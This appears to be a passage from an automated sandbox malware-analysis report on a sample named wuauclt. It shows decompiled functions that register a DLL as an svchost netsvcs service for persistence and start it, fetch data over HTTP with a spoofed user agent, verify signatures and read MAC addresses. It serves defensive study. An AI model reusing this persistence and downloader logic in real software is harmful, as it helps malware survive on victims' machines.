											E00256BE0( &_v1036, "ServiceDll", 2, _v2076, lstrlenA(_v2076)); // executed
											_t81 = _v2068;
										}
									}
								}
							}
							CloseServiceHandle(_t81);
							CloseServiceHandle(_t152);
							_pop(_t159);
							__eflags = _v12 ^ _t169;
							return E00257097(_v12 ^ _t169, _t159);
						} else {
							 *((char*)(_t168 + _t73 - 0x38)) = 0;
							E00267820(_t168 + _v2116 - 0x839,  &_v60, lstrlenA( &_v60) + 2);
							_t114 = RegSetValueExA(_v2112, "netsvcs", 0, 7,  &_v2108, lstrlenA( &_v60) + _v2116 + 1); // executed
							RegCloseKey(_v2112); // executed
							SetLastError(_t114);
							_push(lstrlenA( &_v60) + 1);
							lstrcpyA(E002572ED(_t114, __eflags),  &_v60);
							__eflags = _v8 ^ _t168;
							_pop(_t165);
							return E00257097(_v8 ^ _t168, _t165);
						}
					} else {
						RegCloseKey(_v2112);
						_pop(_t166);
						__eflags = _v8 ^ _t168;
						return E00257097(_v8 ^ _t168, _t166);
					}
				} else {
					_pop(_t167);
					return E00257097(_v8 ^ _t168, _t167);
				}
			}




















































                                                0x00256cf0
                                                0x00256cf0
                                                0x00256cf9
                                                0x00256d00
                                                0x00256d0f
                                                0x00256d14
                                                0x00256d19
                                                0x00256d34
                                                0x00256d3c
                                                0x00256d4f
                                                0x00256d56
                                                0x00256d7c
                                                0x00256d82
                                                0x00256d85
                                                0x00256d8b
                                                0x00256d8d
                                                0x00256db0
                                                0x00256db0
                                                0x00256db2
                                                0x00256db2
                                                0x00256db4
                                                0x00256db7
                                                0x00256dbb
                                                0x00256dbb
                                                0x00256dcb
                                                0x00256dcc
                                                0x00256dcf
                                                0x00256e6e
                                                0x00256e73
                                                0x00256e74
                                                0x00256e75
                                                0x00256e76
                                                0x00256e77
                                                0x00256e78
                                                0x00256e79
                                                0x00256e7a
                                                0x00256e7b
                                                0x00256e7c
                                                0x00256e7d
                                                0x00256e7e
                                                0x00256e7f
                                                0x00256e80
                                                0x00256e81
                                                0x00256e89
                                                0x00256e90
                                                0x00256e97
                                                0x00256e98
                                                0x00256e99
                                                0x00256e9f
                                                0x00256ea4
                                                0x00256ea6
                                                0x00256ec0
                                                0x00256ec6
                                                0x00256ed0
                                                0x00256ed6
                                                0x00256ed8
                                                0x0025701d
                                                0x0025701d
                                                0x0025701d
                                                0x00256ede
                                                0x00256ee4
                                                0x00256f09
                                                0x00256f15
                                                0x00256f17
                                                0x00256f1e
                                                0x00256f24
                                                0x00256f26
                                                0x00000000
                                                0x00256f2c
                                                0x00256f39
                                                0x00256f3b
                                                0x00256f3d
                                                0x00000000
                                                0x00256f43
                                                0x00256f43
                                                0x00256f45
                                                0x00256f5d
                                                0x00256f84
                                                0x00256f8a
                                                0x00256f90
                                                0x00256f92
                                                0x00256f9f
                                                0x00256faf
                                                0x00256fd6
                                                0x00256fea
                                                0x00256ff0
                                                0x0025700d
                                                0x00257012
                                                0x00257018
                                                0x00256f92
                                                0x00256f3d
                                                0x00256f26
                                                0x00257026
                                                0x00257029
                                                0x00257031
                                                0x00257032
                                                0x0025703d
                                                0x00256dd5
                                                0x00256dd5
                                                0x00256df6
                                                0x00256e24
                                                0x00256e32
                                                0x00256e39
                                                0x00256e46
                                                0x00256e56
                                                0x00256e62
                                                0x00256e64
                                                0x00256e6d
                                                0x00256e6d
                                                0x00256d8f
                                                0x00256d95
                                                0x00256d9e
                                                0x00256da2
                                                0x00256dac
                                                0x00256dac
                                                0x00256d3e
                                                0x00256d40
                                                0x00256d4e
                                                0x00256d4e

                                                APIs
                                                • RegOpenKeyExA.KERNELBASE(80000002,SOFTWARE\Microsoft\Windows NT\CurrentVersion\Svchost,00000000,000F003F,?,?,?,00000000), ref: 00256D34
                                                • RegQueryValueExA.KERNELBASE(?,netsvcs,00000000,?,?,?,00000000,?,?,00000000), ref: 00256D7C
                                                • SetLastError.KERNEL32(00000000,?,?,00000000), ref: 00256D85
                                                • RegCloseKey.ADVAPI32(?,?,?,00000000), ref: 00256D95
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.680576375.0000000000251000.00000020.00000001.01000000.00000003.sdmp, Offset: 00250000, based on PE: true
                                                • Associated: 00000000.00000002.680524455.0000000000250000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.680612634.0000000000269000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.680620343.0000000000271000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.680632582.0000000000274000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_250000_wuauclt.jbxd
                                                Similarity
                                                • API ID: CloseErrorLastOpenQueryValue
                                                • String ID: %SystemRoot%\System32\svchost.exe -k netsvcs$Description$Ik%$MACHINE\SYSTEM\CurrentControlSet\Services\%s$SOFTWARE\Microsoft\Windows NT\CurrentVersion\Svchost$SYSTEM\CurrentControlSet\Services\%s$ServiceDll$\Parameters$netsvcs
                                                • API String ID: 75635995-3700864189
                                                • Opcode ID: a30e39902998a88a26725e2bbcd65ed5fc3e9b6c3c7898aceb37abab3d35b4ad
                                                • Instruction ID: 5f879bf857f830ab0784b5d8e6a598b7d24b8777651a3963466985fc13e3526b
                                                • Opcode Fuzzy Hash: a30e39902998a88a26725e2bbcd65ed5fc3e9b6c3c7898aceb37abab3d35b4ad
                                                • Instruction Fuzzy Hash: 30816F71A40118ABCB20AB64EC49FEA7BBCFF44711F0084A5FA49A7141DE715E99CF94
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 00256E80 Relevance: 38.6, APIs: 13, Strings: 9, Instructions: 126registrystringserviceCOMMON
                                                Download Yara Rule

                                                Control-flow Graph

                                                C-Code - Quality: 94%
                                                			E00256E80(void* __ebx, char* __ecx, CHAR* __edx, void* __edi, void* __esi, char* _a4, CHAR* _a8) {
				signed int _v8;
				char _v1032;
				char _v2056;
				void* _v2060;
				char* _v2064;
				CHAR* _v2068;
				CHAR* _v2072;
				int _v2076;
				int _v2080;
				signed int _t29;
				long _t34;
				void* _t35;
				char* _t43;
				char* _t58;
				char* _t62;
				void* _t67;
				char* _t70;
				signed int _t73;

				_t63 = __edx;
				_t29 =  *0x271004; // 0x80aab37c
				_v8 = _t29 ^ _t73;
				_v2064 = _a4;
				_t67 = 0;
				_t58 = __ecx;
				_v2068 = _a8;
				_v2072 = __edx;
				_v2060 = 0x80000002;
				_t34 = RegOpenKeyExA(0x80000002, "SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Svchost", 0, 1,  &_v2060); // executed
				if(_t34 != 0) {
					L5:
					_t35 = 0;
					L6:
					CloseServiceHandle(_t35);
					CloseServiceHandle(_t67);
					return E00257097(_v8 ^ _t73, CloseServiceHandle);
				}
				_v2076 = 0x400;
				_t43 = RegQueryValueExA(_v2060, "netsvcs", 0,  &_v2080,  &_v1032,  &_v2076); // executed
				_t70 = _t43; // executed
				RegCloseKey(_v2060); // executed
				SetLastError(_t70);
				if(_t70 != 0) {
					goto L5;
				}
				_t67 = OpenSCManagerA(_t70, _t70, 0xf003f);
				if(_t67 == 0) {
					goto L5;
				}
				_t62 = _t58; // executed
				E00256CF0(_t58, _t62, _t63, _t67); // executed
				wsprintfA( &_v2056, "MACHINE\\SYSTEM\\CurrentControlSet\\Services\\%s", _t58);
				_t35 = CreateServiceA(_t67, _t58, _v2064, 0xf01ff, 0x10, 2, 1, "%SystemRoot%\\System32\\svchost.exe -k netsvcs", 0, 0, 0, 0, 0);
				_v2064 = _t35;
				if(_t35 != 0) {
					_v2060 = 0x80000002;
					wsprintfA( &_v1032, "SYSTEM\\CurrentControlSet\\Services\\%s", _t58);
					E00256BE0( &_v1032, "Description", 1, _v2068, lstrlenA(_v2068)); // executed
					lstrcatA( &_v1032, "\\Parameters");
					_push(_t62);
					E00256BE0( &_v1032, "ServiceDll", 2, _v2072, lstrlenA(_v2072)); // executed
					_t35 = _v2064;
				}
				goto L6;
			}





















                                                0x00256e80
                                                0x00256e89
                                                0x00256e90
                                                0x00256e99
                                                0x00256e9f
                                                0x00256ea4
                                                0x00256ea6
                                                0x00256ec0
                                                0x00256ec6
                                                0x00256ed0
                                                0x00256ed8
                                                0x0025701d
                                                0x0025701d
                                                0x0025701f
                                                0x00257026
                                                0x00257029
                                                0x0025703d
                                                0x0025703d
                                                0x00256ee4
                                                0x00256f09
                                                0x00256f15
                                                0x00256f17
                                                0x00256f1e
                                                0x00256f26
                                                0x00000000
                                                0x00000000
                                                0x00256f39
                                                0x00256f3d
                                                0x00000000
                                                0x00000000
                                                0x00256f43
                                                0x00256f45
                                                0x00256f5d
                                                0x00256f84
                                                0x00256f8a
                                                0x00256f92
                                                0x00256f9f
                                                0x00256faf
                                                0x00256fd6
                                                0x00256fea
                                                0x00256ff0
                                                0x0025700d
                                                0x00257012
                                                0x00257018
                                                0x00000000

                                                APIs
                                                • RegOpenKeyExA.KERNELBASE(80000002,SOFTWARE\Microsoft\Windows NT\CurrentVersion\Svchost,00000000,00000001,?,00000000,?), ref: 00256ED0
                                                • RegQueryValueExA.KERNELBASE(80000002,netsvcs,00000000,?,?,?), ref: 00256F09
                                                • RegCloseKey.KERNELBASE(80000002), ref: 00256F17
                                                • SetLastError.KERNEL32(00000000), ref: 00256F1E
                                                • OpenSCManagerA.ADVAPI32(00000000,00000000,000F003F), ref: 00256F33
                                                  • Part of subcall function 00256CF0: RegOpenKeyExA.KERNELBASE(80000002,SOFTWARE\Microsoft\Windows NT\CurrentVersion\Svchost,00000000,000F003F,?,?,?,00000000), ref: 00256D34
                                                • wsprintfA.USER32 ref: 00256F5D
                                                • CreateServiceA.ADVAPI32(00000000,?,?,000F01FF,00000010,00000002,00000001,%SystemRoot%\System32\svchost.exe -k netsvcs,00000000,00000000,00000000,00000000,00000000), ref: 00256F84
                                                • wsprintfA.USER32 ref: 00256FAF
                                                • lstrlenA.KERNEL32(?,00000000,00000000), ref: 00256FC0
                                                  • Part of subcall function 00256BE0: RegCreateKeyExA.KERNELBASE(80000002,?,00000000,00000000,00000000,000F003F,00000000,002593E0,80AAB37C,80AAB37C,00000000,73B76980,?,002593E0,0026F6D8,000000FE), ref: 00256C35
                                                  • Part of subcall function 00256BE0: RegOpenKeyExA.KERNELBASE(80000002,?,00000000,0002001F,002593E0,?,002593E0,0026F6D8,000000FE,?,00256FDB,Description,00000001,?,00000000), ref: 00256C4B
                                                  • Part of subcall function 00256BE0: RegSetValueExA.ADVAPI32(002593E0,?,00000000,00256FDB,000000FE,00256FDB,?,002593E0,0026F6D8,000000FE,?,00256FDB,Description,00000001,?,00000000), ref: 00256C6F
                                                • lstrcatA.KERNEL32(?,\Parameters), ref: 00256FEA
                                                • lstrlenA.KERNEL32(?), ref: 00256FF7
                                                  • Part of subcall function 00256BE0: RegSetValueExA.KERNELBASE(002593E0,?,00000000,00256FDB,?,?,?,002593E0,0026F6D8,000000FE,?,00256FDB,Description,00000001,?,00000000), ref: 00256CA8
                                                • CloseServiceHandle.ADVAPI32(00000000), ref: 00257026
                                                • CloseServiceHandle.ADVAPI32(00000000), ref: 00257029
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.680576375.0000000000251000.00000020.00000001.01000000.00000003.sdmp, Offset: 00250000, based on PE: true
                                                • Associated: 00000000.00000002.680524455.0000000000250000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.680612634.0000000000269000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.680620343.0000000000271000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.680632582.0000000000274000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_250000_wuauclt.jbxd
                                                Similarity
                                                • API ID: Open$CloseServiceValue$CreateHandlelstrlenwsprintf$ErrorLastManagerQuerylstrcat
                                                • String ID: %SystemRoot%\System32\svchost.exe -k netsvcs$Description$Ik%$MACHINE\SYSTEM\CurrentControlSet\Services\%s$SOFTWARE\Microsoft\Windows NT\CurrentVersion\Svchost$SYSTEM\CurrentControlSet\Services\%s$ServiceDll$\Parameters$netsvcs
                                                • API String ID: 3938085191-3700864189
                                                • Opcode ID: c5dce43f108d499a4b1bac0cb207c020d86be0c5343945fd668b2e1f2e32dc50
                                                • Instruction ID: ba7012cb210042400ee556bfe93ae25d55b848ad825a985b5933b3e048158500
                                                • Opcode Fuzzy Hash: c5dce43f108d499a4b1bac0cb207c020d86be0c5343945fd668b2e1f2e32dc50
                                                • Instruction Fuzzy Hash: 63415FB5A5022CABCB209F649C49FDA7BBCFF44711F0080A5FA48A7141DEB15ED98F94
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 00256450 Relevance: 22.9, APIs: 10, Strings: 3, Instructions: 155networkfileCOMMON
                                                Download Yara Rule

                                                Control-flow Graph

                                                • Executed
                                                • Not Executed
                                                control_flow_graph 219 256450-256472 220 256474-256475 InternetCloseHandle 219->220 221 256477-25647c 219->221 220->221 222 256481-256486 221->222 223 25647e-25647f InternetCloseHandle 221->223 224 256488-256489 InternetCloseHandle 222->224 225 25648b-2564cc InternetOpenA 222->225 223->222 224->225 226 2564e3-256507 InternetConnectA 225->226 227 2564ce-2564e0 call 257097 225->227 226->227 228 256509-25652a HttpOpenRequestA 226->228 228->227 231 25652c-256533 228->231 232 256535-256545 InternetSetOptionA 231->232 233 25654b-25655e HttpSendRequestA 231->233 232->233 233->227 234 256564-25656b 233->234 235 2565a3 234->235 236 25656d-256572 234->236 238 2565a9-2565f6 HttpQueryInfoA call 25be70 call 256410 235->238 237 256575-256577 236->237 239 25659f-2565a1 237->239 240 256579-256581 237->240 245 2565fb-25660d call 257097 238->245 239->238 240->239 242 256583-25659d InternetReadFile 240->242 242->237 242->239
                                                C-Code - Quality: 89%
                                                			E00256450(void* __ebx, void** __ecx, void* __edi, void** _a8) {
				signed int _v8;
				char _v9;
				short _v11;
				DWORD* _v15;
				void _v40;
				long _v44;
				long _v48;
				void* __esi;
				signed int _t34;
				void* _t36;
				void* _t37;
				void* _t38;
				void* _t40;
				void* _t43;
				void* _t47;
				void* _t53;
				int _t59;
				void** _t65;
				void* _t67;
				void* _t68;
				void** _t75;
				long _t78;
				void* _t80;
				signed int _t81;

				_t34 =  *0x271004; // 0x80aab37c
				_v8 = _t34 ^ _t81;
				_t65 = _a8;
				_t75 = __ecx;
				_t36 =  *__ecx;
				if(_t36 != 0) {
					InternetCloseHandle(_t36);
				}
				_t37 = _t75[1];
				if(_t37 != 0) {
					InternetCloseHandle(_t37);
				}
				_t38 = _t75[2];
				if(_t38 != 0) {
					InternetCloseHandle(_t38);
				}
				 *_t75 = 0;
				_t75[1] = 0;
				_t78 =  !=  ? 0x84a03300 : 0x84200200;
				_t75[2] = 0;
				_t40 = InternetOpenA("Mozilla/4.0 (compatible; MSIE 6.1; Windows NT)", 0, 0, 0, 0); // executed
				_t67 = _t40;
				 *_t75 = _t67;
				if(_t67 != 0) {
					_t43 = InternetConnectA(_t67,  &(_t75[3]), _t75[0x23] & 0x0000ffff, 0, 0, 3, 0, 0); // executed
					_t68 = _t43;
					_t75[1] = _t68;
					if(_t68 == 0) {
						goto L7;
					} else {
						_t47 = HttpOpenRequestA(_t68, "GET",  &(_t75[0x24]), 0, 0, 0, _t78, 0); // executed
						_t75[2] = _t47;
						if(_t47 == 0) {
							goto L7;
						} else {
							if(_t75[0x64] != 0) {
								_t68 =  &_v44;
								_v44 = 0x3380;
								InternetSetOptionA(_t47, 0x1f, _t68, 4);
							}
							if(HttpSendRequestA(_t75[2], 0, 0, 0, 0) == 0) {
								goto L7;
							} else {
								if(_t75[0x64] == 0) {
									 *_t65 = 0;
								} else {
									_t80 = 0;
									_t68 = _t68 | 0xffffffff;
									_v44 = _t68;
									while(_t68 != 0) {
										_t20 = _t80 + 0x1000; // 0x1000
										if( *_t65 > _t20) {
											_t59 = InternetReadFile(_t75[2], _t80, 0x1000,  &_v44);
											_t68 = _v44;
											_t80 = _t80 + _t68;
											if(_t59 != 0) {
												continue;
											}
										}
										break;
									}
									 *_t65 = _t80;
								}
								_v40 = 0;
								_v15 = 0;
								asm("xorps xmm0, xmm0");
								_v11 = 0;
								asm("movups [ebp-0x23], xmm0");
								_v9 = 0;
								asm("movq [ebp-0x13], xmm0");
								_v48 = 0x20;
								HttpQueryInfoA(_t75[2], 0x13,  &_v40,  &_v48, 0);
								_t53 = E0025BE70(_t68,  &_v40);
								E00256410(_t75);
								return E00257097(_v8 ^ _t81, _t53);
							}
						}
					}
				} else {
					L7:
					return E00257097(_v8 ^ _t81, _t78);
				}
			}



























                                                0x00256456
                                                0x0025645d
                                                0x00256461
                                                0x0025646c
                                                0x0025646e
                                                0x00256472
                                                0x00256475
                                                0x00256475
                                                0x00256477
                                                0x0025647c
                                                0x0025647f
                                                0x0025647f
                                                0x00256481
                                                0x00256486
                                                0x00256489
                                                0x00256489
                                                0x002564a4
                                                0x002564af
                                                0x002564b6
                                                0x002564b9
                                                0x002564c0
                                                0x002564c6
                                                0x002564c8
                                                0x002564cc
                                                0x002564fa
                                                0x00256500
                                                0x00256502
                                                0x00256507
                                                0x00000000
                                                0x00256509
                                                0x0025651f
                                                0x00256525
                                                0x0025652a
                                                0x00000000
                                                0x0025652c
                                                0x00256533
                                                0x00256537
                                                0x0025653a
                                                0x00256545
                                                0x00256545
                                                0x0025655e
                                                0x00000000
                                                0x00256564
                                                0x0025656b
                                                0x002565a3
                                                0x0025656d
                                                0x0025656d
                                                0x0025656f
                                                0x00256572
                                                0x00256575
                                                0x00256579
                                                0x00256581
                                                0x00256590
                                                0x00256596
                                                0x00256599
                                                0x0025659d
                                                0x00000000
                                                0x00000000
                                                0x0025659d
                                                0x00000000
                                                0x00256581
                                                0x0025659f
                                                0x0025659f
                                                0x002565ae
                                                0x002565b6
                                                0x002565c3
                                                0x002565c6
                                                0x002565cc
                                                0x002565d0
                                                0x002565d4
                                                0x002565d9
                                                0x002565e0
                                                0x002565ea
                                                0x002565f6
                                                0x0025660d
                                                0x0025660d
                                                0x0025655e
                                                0x0025652a
                                                0x002564d0
                                                0x002564d0
                                                0x002564e0
                                                0x002564e0

                                                APIs
                                                • InternetCloseHandle.WININET(80AAB37C), ref: 00256475
                                                • InternetCloseHandle.WININET(?), ref: 0025647F
                                                • InternetCloseHandle.WININET(?), ref: 00256489
                                                • InternetOpenA.WININET(Mozilla/4.0 (compatible; MSIE 6.1; Windows NT),00000000,00000000,00000000,00000000), ref: 002564C0
                                                • InternetConnectA.WININET(00000000,?,?,00000000,00000000,00000003,00000000,00000000), ref: 002564FA
                                                • HttpOpenRequestA.WININET(00000000,GET,?,00000000,00000000,00000000,84200200,00000000), ref: 0025651F
                                                • InternetSetOptionA.WININET(00000000,0000001F,?,00000004), ref: 00256545
                                                • HttpSendRequestA.WININET(00000000,00000000,00000000,00000000,00000000), ref: 00256556
                                                • InternetReadFile.WININET(00000000,00000000,00001000,?), ref: 00256590
                                                • HttpQueryInfoA.WININET(00000000,00000013,00000000,?,00000000), ref: 002565E0
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.680576375.0000000000251000.00000020.00000001.01000000.00000003.sdmp, Offset: 00250000, based on PE: true
                                                • Associated: 00000000.00000002.680524455.0000000000250000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.680612634.0000000000269000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.680620343.0000000000271000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.680632582.0000000000274000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_250000_wuauclt.jbxd
                                                Similarity
                                                • API ID: Internet$CloseHandleHttp$OpenRequest$ConnectFileInfoOptionQueryReadSend
                                                • String ID: $GET$Mozilla/4.0 (compatible; MSIE 6.1; Windows NT)
                                                • API String ID: 267240362-3267693786
                                                • Opcode ID: b1aeac19f4c591d75fd911a842f7984cbf421cabbaa582be769f5e6f15209942
                                                • Instruction ID: ac7f40be09bc8c605512e04644f01b8652e247207d6390972ee0ecce2b305999
                                                • Opcode Fuzzy Hash: b1aeac19f4c591d75fd911a842f7984cbf421cabbaa582be769f5e6f15209942
                                                • Instruction Fuzzy Hash: 5E51B770B50306BBEB248F64DC49FA9B7E8AF09711F504159FD04E72C0DBB0A968CBA4
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 002546E0 Relevance: 10.6, APIs: 7, Instructions: 71encryptionCOMMON
                                                Download Yara Rule

                                                Control-flow Graph

                                                • Executed
                                                • Not Executed
                                                control_flow_graph 313 2546e0-2546fd CryptAcquireContextA 314 254705-254722 CryptImportKey 313->314 315 2546ff-254704 313->315 314->315 316 254724-25473c CryptCreateHash 314->316 316->315 317 25473e-254751 CryptHashData 316->317 317->315 318 254753-25477e CryptVerifySignatureA 317->318 319 254787-25478c 318->319 320 254780-254781 CryptDestroyHash 318->320 321 254797-25479d 319->321 322 25478e-254791 CryptReleaseContext 319->322 320->319 322->321
                                                C-Code - Quality: 28%
                                                			E002546E0(intOrPtr _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr _a16) {
				char _v8;
				long* _v12;
				long* _v16;
				int _t16;
				int _t18;
				char* _t20;
				intOrPtr _t21;
				void* _t24;
				void* _t27;
				long* _t30;

				_t16 = CryptAcquireContextA( &_v12, 0, 0, 1, 0xf0000000); // executed
				if(_t16 != 0) {
					_t18 = CryptImportKey(_v12, 0x272ba0, 0x94, 0, 0,  &_v16); // executed
					if(_t18 == 0) {
						goto L1;
					} else {
						_t20 =  &_v8;
						__imp__CryptCreateHash(_v12, 0x8003, 0, 0, _t20); // executed
						if(_t20 == 0) {
							goto L1;
						} else {
							__imp__CryptHashData(_v8, _a4, _a8, 0);
							if(_t20 == 0) {
								goto L1;
							} else {
								__imp__CryptVerifySignatureA(_v8, _a12, _a16, _v16, 0, 0, _t24); // executed
								_t21 = _v8;
								_t27 =  !=  ? 1 : 0;
								if(_t21 != 0) {
									__imp__CryptDestroyHash(_t21);
								}
								_t30 = _v12;
								if(_t30 != 0) {
									CryptReleaseContext(_t30, 0);
								}
								return _t27;
							}
						}
					}
				} else {
					L1:
					return 0;
				}
			}













                                                0x002546f5
                                                0x002546fd
                                                0x0025471a
                                                0x00254722
                                                0x00000000
                                                0x00254724
                                                0x00254724
                                                0x00254734
                                                0x0025473c
                                                0x00000000
                                                0x0025473e
                                                0x00254749
                                                0x00254751
                                                0x00000000
                                                0x00254753
                                                0x00254766
                                                0x00254771
                                                0x00254779
                                                0x0025477e
                                                0x00254781
                                                0x00254781
                                                0x00254787
                                                0x0025478c
                                                0x00254791
                                                0x00254791
                                                0x0025479d
                                                0x0025479d
                                                0x00254751
                                                0x0025473c
                                                0x002546ff
                                                0x002546ff
                                                0x00254704
                                                0x00254704

                                                APIs
                                                • CryptAcquireContextA.ADVAPI32(?,00000000,00000000,00000001,F0000000), ref: 002546F5
                                                • CryptImportKey.ADVAPI32(?,00272BA0,00000094,00000000,00000000,?), ref: 0025471A
                                                • CryptCreateHash.ADVAPI32(?,00008003,00000000,00000000,?), ref: 00254734
                                                • CryptHashData.ADVAPI32(?,?,?,00000000), ref: 00254749
                                                • CryptVerifySignatureA.ADVAPI32(?,?,00000000,?,00000000,00000000), ref: 00254766
                                                • CryptDestroyHash.ADVAPI32(?), ref: 00254781
                                                • CryptReleaseContext.ADVAPI32(?,00000000), ref: 00254791
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.680576375.0000000000251000.00000020.00000001.01000000.00000003.sdmp, Offset: 00250000, based on PE: true
                                                • Associated: 00000000.00000002.680524455.0000000000250000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.680612634.0000000000269000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.680620343.0000000000271000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.680632582.0000000000274000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_250000_wuauclt.jbxd
                                                Similarity
                                                • API ID: Crypt$Hash$Context$AcquireCreateDataDestroyImportReleaseSignatureVerify
                                                • String ID:
                                                • API String ID: 949692108-0
                                                • Opcode ID: 8566db5b7871a37c41d58dad6130fa72b85a3e1b2244ddd9410de485442c9289
                                                • Instruction ID: 8ec8519f1c283c5ff9e7a6ed434f514114ce8f4cf913bbfd3bf2eee89237ef71
                                                • Opcode Fuzzy Hash: 8566db5b7871a37c41d58dad6130fa72b85a3e1b2244ddd9410de485442c9289
                                                • Instruction Fuzzy Hash: 9F214F3578020ABBEF209FA0EC49FA9BB7CAB05B05F104054FE04E50D0DBB19AA49A18
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 00257040 Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 35serviceCOMMON
                                                Download Yara Rule

                                                Control-flow Graph

                                                C-Code - Quality: 100%
                                                			E00257040(char* __ecx, void* __eflags, intOrPtr _a4, char _a8) {
				void* __ebx;
				void* __esi;
				void* _t4;
				void* _t5;
				void* _t9;
				void* _t10;
				void* _t12;
				void* _t13;
				char* _t14;
				void* _t15;

				_t1 =  &_a8; // 0x256b49
				_t14 = __ecx;
				E00256E80(_t9, __ecx, _t12, _t13, __ecx, _a4,  *_t1); // executed
				_t4 = OpenSCManagerA(0, 0, 2);
				_t10 = _t4;
				if(_t10 != 0) {
					_t5 = OpenServiceA(_t10, _t14, 0x10010); // executed
					_t15 = _t5;
					if(_t15 != 0) {
						StartServiceA(_t15, 0, 0);
						CloseServiceHandle(_t15);
					}
					return CloseServiceHandle(_t10);
				}
				return _t4;
			}













                                                0x00257045
                                                0x00257048
                                                0x0025704d
                                                0x0025705b
                                                0x00257061
                                                0x00257065
                                                0x0025706e
                                                0x00257074
                                                0x00257078
                                                0x0025707f
                                                0x00257086
                                                0x00257086
                                                0x00000000
                                                0x0025708d
                                                0x00257096

                                                APIs
                                                  • Part of subcall function 00256E80: RegOpenKeyExA.KERNELBASE(80000002,SOFTWARE\Microsoft\Windows NT\CurrentVersion\Svchost,00000000,00000001,?,00000000,?), ref: 00256ED0
                                                  • Part of subcall function 00256E80: RegQueryValueExA.KERNELBASE(80000002,netsvcs,00000000,?,?,?), ref: 00256F09
                                                  • Part of subcall function 00256E80: RegCloseKey.KERNELBASE(80000002), ref: 00256F17
                                                  • Part of subcall function 00256E80: SetLastError.KERNEL32(00000000), ref: 00256F1E
                                                  • Part of subcall function 00256E80: OpenSCManagerA.ADVAPI32(00000000,00000000,000F003F), ref: 00256F33
                                                  • Part of subcall function 00256E80: wsprintfA.USER32 ref: 00256F5D
                                                  • Part of subcall function 00256E80: CreateServiceA.ADVAPI32(00000000,?,?,000F01FF,00000010,00000002,00000001,%SystemRoot%\System32\svchost.exe -k netsvcs,00000000,00000000,00000000,00000000,00000000), ref: 00256F84
                                                  • Part of subcall function 00256E80: wsprintfA.USER32 ref: 00256FAF
                                                  • Part of subcall function 00256E80: lstrlenA.KERNEL32(?,00000000,00000000), ref: 00256FC0
                                                  • Part of subcall function 00256E80: lstrcatA.KERNEL32(?,\Parameters), ref: 00256FEA
                                                • OpenSCManagerA.ADVAPI32(00000000,00000000,00000002,?,?), ref: 0025705B
                                                • OpenServiceA.ADVAPI32(00000000,?,00010010), ref: 0025706E
                                                • StartServiceA.ADVAPI32(00000000,00000000,00000000), ref: 0025707F
                                                • CloseServiceHandle.ADVAPI32(00000000), ref: 00257086
                                                • CloseServiceHandle.ADVAPI32(00000000), ref: 0025708D
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.680576375.0000000000251000.00000020.00000001.01000000.00000003.sdmp, Offset: 00250000, based on PE: true
                                                • Associated: 00000000.00000002.680524455.0000000000250000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.680612634.0000000000269000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.680620343.0000000000271000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.680632582.0000000000274000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_250000_wuauclt.jbxd
                                                Similarity
                                                • API ID: Service$Open$Close$HandleManagerwsprintf$CreateErrorLastQueryStartValuelstrcatlstrlen
                                                • String ID: Ik%
                                                • API String ID: 1917720802-1292306806
                                                • Opcode ID: e6ee2f8d3173bb4b1a34333b617d4df0c01ef8d88fce59db7b187833087ed2a0
                                                • Instruction ID: ffd3a9ac7afeac31520573d12c9ec0976801b423dac3a6ce16e1065357ae2595
                                                • Opcode Fuzzy Hash: e6ee2f8d3173bb4b1a34333b617d4df0c01ef8d88fce59db7b187833087ed2a0
                                                • Instruction Fuzzy Hash: 20F0373564531577D7211B60BC4EF9A7A5CDB08762F004010FE0966191DEF1995445A4
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 00255F70 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 73networkCOMMON
                                                Download Yara Rule
                                                APIs
                                                • WSAStartup.WS2_32(00000202,?), ref: 00255F96
                                                • GetAdaptersInfo.IPHLPAPI(?,?), ref: 00255FBC
                                                Strings
                                                • %02X:%02X:%02X:%02X:%02X:%02X, xrefs: 00256059
                                                • 10:00:00:00:00:01, xrefs: 0025600C
                                                Memory Dump Source
